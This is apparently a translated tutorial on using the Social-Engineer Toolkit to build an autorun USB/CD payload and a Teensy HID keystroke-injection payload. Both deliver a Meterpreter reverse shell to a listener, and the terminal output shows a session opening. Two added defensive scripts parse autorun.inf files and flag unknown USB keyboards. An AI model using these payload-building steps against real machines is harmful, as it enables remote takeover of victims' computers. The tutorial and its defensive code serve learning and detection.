1. The Infectious Media Generator is a simple attack vector: the generated files are burned to a CD/DVD or copied onto a USB drive.
The generation steps are as follows:
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) Third Party Modules
99) Return back to the main menu.
set> 3
The Infectious USB/CD/DVD module will create an autorun.inf file and a
Metasploit payload. When the DVD/USB/CD is inserted, it will automatically
run if autorun is enabled.
Pick the attack vector you wish to use: fileformat bugs or a straight executable.
1) File-Format Exploits
2) Standard Metasploit Executable
99) Return to Main Menu
set:infectious>2
1) Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker
2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker
3) Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker
4) Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline
5) Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter
6) Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports
7) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
8) Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and use Reverse Meterpreter
9) Download/Run your Own Executable Downloads an executable and runs it
set:payloads>2
set:payloads> IP address for the payload listener (LHOST):192.168.1.113
set:payloads> Enter the PORT for the reverse listener:443
[*] Generating the payload.. please be patient.
[*] Payload has been exported to the default SET directory located under: /root/.set/payload.exe
[*] Your attack has been created in the SET home directory (/root/.set/) folder 'autorun'
[*] Note a backup copy of template.pdf is also in /root/.set/template.pdf if needed.
[-] Copy the contents of the folder to a CD/DVD/USB to autorun
set> Create a listener right now [yes|no]: yes
[*] Launching Metasploit.. This could take a few. Be patient! Or else no shells for you..
[!] The following modules could not be loaded!..-
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go
[!] Please see /root/.msf4/logs/framework.log for details.
=[ metasploit v6.0.43-dev ]
+ -- --=[ 2129 exploits - 1137 auxiliary - 363 post ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: Metasploit can be configured at startup, see
msfconsole --help to learn more
[*] Processing /root/.set/meta_config for ERB directives.
resource (/root/.set/meta_config)> use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
resource (/root/.set/meta_config)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (/root/.set/meta_config)> set LHOST 192.168.1.113
LHOST => 192.168.1.113
resource (/root/.set/meta_config)> set LPORT 443
LPORT => 443
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/meta_config)> exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.1.113:443
msf6 exploit(multi/handler) > [*] Sending stage (175174 bytes) to 192.168.1.115
[*] Meterpreter session 1 opened (192.168.1.113:443 -> 192.168.1.115:1604) at 2021-06-22 21:31:43 +0800
As shown above, the output is saved under /root/.set; open another terminal and copy the attack vector to wherever it is needed.
┌──(root💀kali)-[~]
└─# cd /
┌──(root💀kali)-[/]
└─# ls
bin dev home initrd.img.old lib32 libx32 media opt root sbin sys usr vmlinuz
boot etc initrd.img lib lib64 lost+found mnt proc run srv tmp var vmlinuz.old
┌──(root💀kali)-[/]
└─# cd root/.set
┌──(root💀kali)-[~/.set]
└─# ls
autorun meta_config payload.exe payloadgen set.options
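The point of the infectious media vector above is that Windows AutoRun reads autorun.inf from the inserted media and launches whatever the open= (or shellexecute=) directive names. The following triage helper is an added example, not part of the original post and not SET's own code: it parses an autorun.inf found on removable media and reports every directive that would launch a program. The sample files, including the payload.exe name that mirrors the SET output above, are constructed for the demonstration.

```python
"""Triage helper for autorun.inf files found on removable media.

Added example (not part of the original post and not SET's own code).
Windows AutoRun reads the [autorun] section of an INI-style autorun.inf;
the open= and shellexecute= directives, and any shell\\<verb>\\command=
directive, name a program to run.  This parser reports each of them so an
analyst can see what the media would have launched.
"""
import configparser
from typing import List

# Directives that name a program for AutoRun to execute.
LAUNCH_KEYS = {"open", "shellexecute"}


def inspect_autorun(text: str) -> List[str]:
    """Return one finding per directive that would launch a program.

    An empty list means no launch directive was found; icon=, label= and
    action= only change how the drive is presented and are not reported.
    """
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        cp.read_string(text.lstrip("\ufeff"))  # tolerate a UTF-8 BOM
    except configparser.Error as exc:
        return [f"unparseable autorun.inf: {exc}"]

    # Section names are case-sensitive in configparser but not on Windows.
    section = next((s for s in cp.sections() if s.lower() == "autorun"), None)
    if section is None:
        return []

    findings = []
    for key, value in cp.items(section):  # keys are lower-cased by configparser
        value = value.strip()
        if key in LAUNCH_KEYS:
            findings.append(f"{key}= launches {value!r}")
        elif key.startswith("shell\\") and key.endswith("\\command"):
            # shell\<verb>\command= registers a context-menu verb that runs a program
            findings.append(f"{key}= launches {value!r}")
    return findings


def is_suspicious(text: str) -> bool:
    """True when the file contains at least one launch directive."""
    return bool(inspect_autorun(text))


# Constructed samples: a dropper-style file and a benign labelling file.
SAMPLE_DROPPER = (
    "[autorun]\n"
    "open=payload.exe\n"  # constructed name, mirrors the SET output above
    "icon=payload.exe,0\n"
    "action=Open folder to view files\n"
)
SAMPLE_BENIGN = (
    "[AutoRun]\n"
    "icon=drive.ico\n"
    "label=Backup Drive\n"
)

if __name__ == "__main__":
    for name, sample in (("dropper", SAMPLE_DROPPER), ("benign", SAMPLE_BENIGN)):
        print(name, "->", inspect_autorun(sample) or "no launch directive")
```

The condition SET itself states ("if autorun is enabled") is the control: on Windows, setting the NoDriveTypeAutoRun policy value under HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer to 0xFF disables AutoRun for every drive type. The parser above is for triaging media after it has been found, not a substitute for that setting.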
2. USB HID attack: a combination of custom hardware and keyboard emulation used to bypass restrictions. When a USB drive, CD or DVD is inserted, autorun.inf runs automatically, but once AutoPlay/AutoRun is turned off it can no longer execute. A USB HID device, however, can emulate a keyboard and mouse; when it is plugged in it can send a sequence of keystrokes and thereby gain full control.
The steps are as follows:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) Third Party Modules
99) Return back to the main menu.
set> 6
The Arduino-Based Attack Vector utilizes the Arduin-based device to
program the device. You can leverage the Teensy's, which have onboard
storage and can allow for remote code execution on the physical
system. Since the devices are registered as USB Keyboard's it
will bypass any autorun disabled or endpoint protection on the
system.
You will need to purchase the Teensy USB device, it's roughly
$22 dollars. This attack vector will auto generate the code
needed in order to deploy the payload on the system for you.
This attack vector will create the .pde files necessary to import
into Arduino (the IDE used for programming the Teensy). The attack
vectors range from Powershell based downloaders, wscript attacks,
and other methods.
For more information on specifications and good tutorials visit:
http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle
To purchase a Teensy, visit: http://www.pjrc.com/store/teensy.html
Special thanks to: IronGeek, WinFang, and Garland
This attack vector also attacks X10 based controllers, be sure to be leveraging
X10 based communication devices in order for this to work.
Select a payload to create the pde file to import into Arduino:
1) Powershell HTTP GET MSF Payload
2) WSCRIPT HTTP GET MSF Payload
3) Powershell based Reverse Shell Payload
4) Internet Explorer/FireFox Beef Jack Payload
5) Go to malicious java site and accept applet Payload
6) Gnome wget Download Payload
7) Binary 2 Teensy Attack (Deploy MSF payloads)
8) SDCard 2 Teensy Attack (Deploy Any EXE)
9) SDCard 2 Teensy Attack (Deploy on OSX)
10) X10 Arduino Sniffer PDE and Libraries
11) X10 Arduino Jammer PDE and Libraries
12) Powershell Direct ShellCode Teensy Attack
13) Peensy Multi Attack Dip Switch + SDCard Attack
14) HID Msbuild compile to memory Shellcode Attack
99) Return to Main Menu
set:arduino>1
set> Do you want to create a payload and listener [yes|no]: : yes
What payload do you want to generate:
Name: Description:
1) Meterpreter Memory Injection (DEFAULT) This will drop a meterpreter payload through powershell injection
2) Meterpreter Multi-Memory Injection This will drop multiple Metasploit payloads via powershell injection
3) SE Toolkit Interactive Shell Custom interactive reverse toolkit designed for SET
4) SE Toolkit HTTP Reverse Shell Purely native HTTP shell with AES encryption support
5) RATTE HTTP Tunneling Payload Security bypass payload that will tunnel all comms over HTTP
6) ShellCodeExec Alphanum Shellcode This will drop a meterpreter payload through shellcodeexec
7) Import your own executable Specify a path for your own executable
8) Import your own commands.txt Specify payloads to be sent via command line
set:payloads>1
set:payloads> PORT of the listener [443]:
Select the payload you want to deliver via shellcode injection
1) Windows Meterpreter Reverse TCP
2) Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
3) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager
4) Windows Meterpreter (ALL PORTS) Reverse TCP
set:payloads> Enter the number for the payload [meterpreter_reverse_https]:1
[*] Prepping pyInjector for delivery..
[*] INO file created. You can get it under '/root/.set/reportsteensy_2021-06-22 21:43:59.407019.ino'
[*] Be sure to select "Tools", "Board", and "Teensy 2.0 (USB/KEYBOARD)" in Arduino
[*] If your running into issues with VMWare Fusion and the start menu, uncheck
the 'Enable Key Mapping' under preferences in VMWare
Press {return} to continue.
As the prompt says, the file is saved in the .set folder; inspect it there and flash it to the Arduino.
┌──(root💀kali)-[~/.set]
└─# cd reports
┌──(root💀kali)-[~/.set/reports]
└─# ls
'teensy_2021-06-22 21:42:48.689485.ino' 'teensy_2021-06-22 21:48:06.725690.ino'
'teensy_2021-06-22 21:43:59.407019.ino' 'teensy_2021-06-22 21:48:19.651537.ino'
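The reason the HID vector works is the one SET's own text states: the Teensy enumerates as a USB keyboard, so AutoRun settings and file-based endpoint controls never see a file to inspect. The defender's signal is therefore a keyboard appearing that the host has never seen before. The script below is an added example, not from the original post and not SET's code: it parses the hid-generic lines the Linux kernel logs when a HID device attaches and flags any keyboard whose idVendor:idProduct is not on a site allowlist. The log excerpt, the product names and the VID:PID abcd:1234 are constructed; no Teensy identifiers are assumed, and the script generalises to any self-typing device, not only the Teensy.

```python
"""Flag USB keyboards that a Linux host has not seen before.

Added example (not from the original post and not SET's code).  When a HID
device attaches, the kernel logs a line such as
  hid-generic 0003:VVVV:PPPP.NNNN: input,hidrawN: USB HID v1.11 Keyboard [name] on usb-...
A device that types by itself must enumerate as a Keyboard, so a keyboard
whose idVendor:idProduct is not on the site allowlist is the signal.
"""
import re
from typing import Iterable, List, NamedTuple, Set, Tuple

HID_LINE = re.compile(
    r"hid-generic 0003:(?P<vid>[0-9A-Fa-f]{4}):(?P<pid>[0-9A-Fa-f]{4})\.\d+: "
    r".*?USB HID v[\d.]+ (?P<kind>\w+) \[(?P<name>[^\]]*)\]"
)


class HidEvent(NamedTuple):
    vid: str   # idVendor, lower-case hex
    pid: str   # idProduct, lower-case hex
    kind: str  # Keyboard, Mouse or Device as reported by the kernel
    name: str  # product string the device supplied


def parse_hid_events(lines: Iterable[str]) -> List[HidEvent]:
    """Extract every HID attach event from kernel log lines."""
    events = []
    for line in lines:
        m = HID_LINE.search(line)
        if m:
            events.append(HidEvent(m["vid"].lower(), m["pid"].lower(), m["kind"], m["name"]))
    return events


def unexpected_keyboards(lines: Iterable[str], allowlist: Set[Tuple[str, str]]) -> List[HidEvent]:
    """Keyboards whose (vid, pid) is not on the allowlist, in log order."""
    return [
        e for e in parse_hid_events(lines)
        if e.kind == "Keyboard" and (e.vid, e.pid) not in allowlist
    ]


# Constructed log excerpt: a previously enrolled keyboard (sample values),
# then an unknown composite device that presents both a keyboard and a mouse
# interface.  The VID:PID abcd:1234 and the product names are made up.
SAMPLE_DMESG = """\
[   12.345678] usb 1-1.3: new full-speed USB device number 5 using xhci_hcd
[   12.456789] hid-generic 0003:046D:C31C.0004: input,hidraw0: USB HID v1.10 Keyboard [Logitech USB Keyboard] on usb-0000:00:14.0-1.3/input0
[   12.470000] hid-generic 0003:046D:C31C.0005: input,hidraw1: USB HID v1.10 Device [Logitech USB Keyboard] on usb-0000:00:14.0-1.3/input1
[  301.100000] usb 1-1.4: new full-speed USB device number 6 using xhci_hcd
[  301.200000] hid-generic 0003:ABCD:1234.0006: input,hidraw2: USB HID v1.11 Keyboard [Example Programmable Keyboard] on usb-0000:00:14.0-1.4/input0
[  301.210000] hid-generic 0003:ABCD:1234.0007: input,hidraw3: USB HID v1.11 Mouse [Example Programmable Keyboard] on usb-0000:00:14.0-1.4/input1
""".splitlines()

# Site allowlist of keyboards that are expected on this host.
ALLOWLIST = {("046d", "c31c")}

if __name__ == "__main__":
    for ev in unexpected_keyboards(SAMPLE_DMESG, ALLOWLIST):
        print(f"ALERT: unexpected keyboard {ev.vid}:{ev.pid} [{ev.name}]")
```

The same allowlist idea is what USBGuard enforces on Linux before a device is authorised; the parser above only reports after the fact, so it belongs in log collection as a detection, not as the only control. A composite device that exposes both a keyboard and a mouse interface (as in the sample) produces two lines, and only the Keyboard one is considered.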
This article walked through using the SET toolkit to generate the infectious media attack vector and the USB HID attack vector; it is for learning purposes only.